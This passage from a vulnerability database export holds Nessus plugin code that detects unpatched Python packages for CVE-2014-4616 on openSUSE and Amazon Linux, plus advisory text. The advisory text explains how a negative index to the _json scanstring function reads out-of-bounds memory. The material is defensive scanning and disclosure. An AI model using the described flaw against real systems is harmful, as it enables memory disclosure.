value:\"p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-gdbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-base-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-curses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-curses-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-dbm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-dbm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-idle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-testsuite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython2_7-1_0-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython3_3m1_0-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libpython3_3m1_0-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-base-debugsource-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-curses-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-debugsource-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-demo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-devel-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-doc-pdf-2.7-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-gdbm-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-idle-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-tk-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python-xml-debuginfo-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-base-debugsource-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-curses-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-curses-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-dbm-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-dbm-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-debugsource-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-devel-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-devel-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-doc-pdf-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-idle-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-testsuite-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-testsuite-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tk-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tk-debuginfo-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"python3-tools-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python-debuginfo-32bit-2.7.3-10.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-base-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-base-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"python3-debuginfo-32bit-3.3.0-6.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython2_7-1_0-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython2_7-1_0-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython3_3m1_0-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libpython3_3m1_0-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-base-debugsource-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-curses-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-curses-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-debugsource-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-demo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-devel-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-doc-pdf-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-gdbm-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-gdbm-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-idle-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-tk-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-tk-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-xml-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python-xml-debuginfo-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-base-debugsource-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-curses-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-curses-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-dbm-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-dbm-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-debugsource-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-devel-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-devel-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-doc-pdf-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-idle-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-testsuite-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-testsuite-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-tk-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-tk-debuginfo-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"python3-tools-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython2_7-1_0-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libpython3_3m1_0-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-base-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-base-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python-debuginfo-32bit-2.7.6-8.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-base-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-base-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"python3-debuginfo-32bit-3.3.5-5.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:10:21", "description": "It was reported that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.'", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : python27 (ALAS-2014-380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python27", "p-cpe:/a:amazon:linux:python27-debuginfo", "p-cpe:/a:amazon:linux:python27-devel", "p-cpe:/a:amazon:linux:python27-libs", "p-cpe:/a:amazon:linux:python27-test", "p-cpe:/a:amazon:linux:python27-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-380.NASL", "href": "https://www.tenable.com/plugins/nessus/78323", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-380.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78323);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/19 11:02:41\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_xref(name:\"ALAS\", value:\"2014-380\");\n\n script_name(english:\"Amazon Linux AMI : python27 (ALAS-2014-380)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that Python built-in _json module have a flaw\n(insufficient bounds checking), which allows a local user to read\ncurrent process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able\nto control or influence the two parameters of the default scanstring\nfunction: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index\nvalue. The index value is then used directly as an index to an array\nin the C code; internally the address of the array and its index are\nadded to each other in order to yield the address of the value that is\ndesired. However, by supplying a negative index value and adding this\nto the address of the array, the processor's register value wraps\naround and the calculated value will point to a position in memory\nwhich isn't within the bounds of the supplied string, causing the\nfunction to access other parts of the process memory.'\"\n );\n # http://bugs.python.org/issue21529\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue21529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-380.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python27' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python27-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python27-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-debuginfo-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-devel-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-libs-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-test-2.7.5-13.35.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python27-tools-2.7.5-13.35.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python27 / python27-debuginfo / python27-devel / python27-libs / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:14", "description": "It was reported that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.'", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : python-simplejson (ALAS-2014-374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:python-simplejson", "p-cpe:/a:amazon:linux:python-simplejson-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-374.NASL", "href": "https://www.tenable.com/plugins/nessus/78317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-374.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78317);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/19 11:02:41\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_xref(name:\"ALAS\", value:\"2014-374\");\n\n script_name(english:\"Amazon Linux AMI : python-simplejson (ALAS-2014-374)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was reported that Python built-in _json module have a flaw\n(insufficient bounds checking), which allows a local user to read\ncurrent process' arbitrary memory.\n\nQuoting the upstream bug report :\n\n'The sole prerequisites of this attack are that the attacker is able\nto control or influence the two parameters of the default scanstring\nfunction: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index\nvalue. The index value is then used directly as an index to an array\nin the C code; internally the address of the array and its index are\nadded to each other in order to yield the address of the value that is\ndesired. However, by supplying a negative index value and adding this\nto the address of the array, the processor's register value wraps\naround and the calculated value will point to a position in memory\nwhich isn't within the bounds of the supplied string, causing the\nfunction to access other parts of the process memory.'\"\n );\n # http://bugs.python.org/issue21529\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue21529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update python-simplejson' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-simplejson-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif 